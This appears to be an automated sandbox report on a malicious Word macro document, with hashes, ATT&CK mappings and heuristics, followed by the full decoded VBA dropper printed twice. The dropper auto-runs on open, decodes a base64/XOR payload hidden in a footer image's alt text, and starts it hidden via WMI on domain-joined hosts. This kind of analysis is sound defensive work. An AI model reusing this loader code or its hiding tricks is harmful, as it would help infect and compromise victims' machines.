Office (OLE) malware analysis — malicious · 3dd3853eeb6939c3

MALICIOUS

Office (OLE)

41.5 KB Created: 2017-12-19 12:58:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: a4f2eecb5b667cfe32635d846b03e48d SHA-1: e7b3fb58b816919c60bc914c1da989e3d4dcbb85 SHA-256: 3dd3853eeb6939c399703386d1edb0bd566a3d7e4e6cc15362f7f0b199f1caf5

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This Office document contains VBA macros, specifically an AutoOpen macro, designed to execute malicious code. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the macro attempts to launch a process using WMI's Win32_Process.Create method. This suggests the document is a dropper, likely intended to download and execute a second-stage payload. The presence of obfuscated VBA code and the use of WMI for process creation are common tactics for malware execution.

Heuristics 10

ClamAV: Doc.Dropper.Agent-6403433-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6403433-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2548 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2548 bytes
SHA-256: `80075ca2090ddbd1221f8163c205583203d63fc1a063cc74ef4693b3f2accad6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MyDocument" Function clean(s As String) s = Replace(s, " ", "") s = Replace(s, vbCr, "") s = Replace(s, vbLf, "") clean = Replace(s, vbCrLf, "") End Function Function bb(ByVal b) Const bbb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin dataLength = Len(b) If dataLength Mod 4 <> 0 Then Exit Function End If For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(b, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, bbb, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Exit Function End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next bb = sOut End Function Function x(ByRef Text As String, ByRef key As String) Dim l As Long Dim lonLenKey As Long, lonKeyPos As Long lonLenKey = Len(key) For l = 1 To Len(Text) lonKeyPos = lonKeyPos + 1 If lonKeyPos > lonLenKey Then lonKeyPos = 1 Mid$(Text, l, 1) = Chr$(Asc(Mid$(Text, l, 1)) Xor Asc(Mid$(key, lonKeyPos, 1))) Next l End Function Public Function BIkqX() As Variant Dim f As String f = ActiveDocument.Sections(1).Footers(1).Range.InlineShapes(1).AlternativeText f = bb(clean(f)) x f, "MlEEpqHRFRKYCThPeoyfPyyYtvdrQHDx" f = bb(f) Set s = GetObject("winmgmts:\\.\root\cimv2").Get("Win32_ProcessStartup") Set c = s.SpawnInstance_ c.ShowWindow = 0 Call GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create(f, Null, c, i) End Function Sub Auto_Open() If Not Environ("USERDNSDOMAIN") = "" Then Call BIkqX End If End Sub Sub AutoOpen() Auto_Open End Sub

SHA-256: 80075ca2090ddbd1221f8163c205583203d63fc1a063cc74ef4693b3f2accad6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MyDocument"

Function clean(s As String)
    s = Replace(s, " ", "")
    s = Replace(s, vbCr, "")
    s = Replace(s, vbLf, "")
    clean = Replace(s, vbCrLf, "")
End Function

Function bb(ByVal b)
  Const bbb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  dataLength = Len(b)
  If dataLength Mod 4 <> 0 Then
    Exit Function
  End If

  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3
      thisChar = Mid(b, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, bbb, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  bb = sOut
End Function

Function x(ByRef Text As String, ByRef key As String)
    Dim l As Long
    Dim lonLenKey As Long, lonKeyPos As Long
    lonLenKey = Len(key)
    For l = 1 To Len(Text)
        lonKeyPos = lonKeyPos + 1
        If lonKeyPos > lonLenKey Then lonKeyPos = 1
        Mid$(Text, l, 1) = Chr$(Asc(Mid$(Text, l, 1)) Xor Asc(Mid$(key, lonKeyPos, 1)))
    Next l
End Function

Public Function BIkqX() As Variant
    Dim f As String
    f = ActiveDocument.Sections(1).Footers(1).Range.InlineShapes(1).AlternativeText
    f = bb(clean(f))
    x f, "MlEEpqHRFRKYCThPeoyfPyyYtvdrQHDx"
    f = bb(f)
    Set s = GetObject("winmgmts:\\.\root\cimv2").Get("Win32_ProcessStartup")
    Set c = s.SpawnInstance_
    c.ShowWindow = 0
    Call GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create(f, Null, c, i)
End Function

Sub Auto_Open()
    If Not Environ("USERDNSDOMAIN") = "" Then
        Call BIkqX
    End If
End Sub
Sub AutoOpen()
    Auto_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.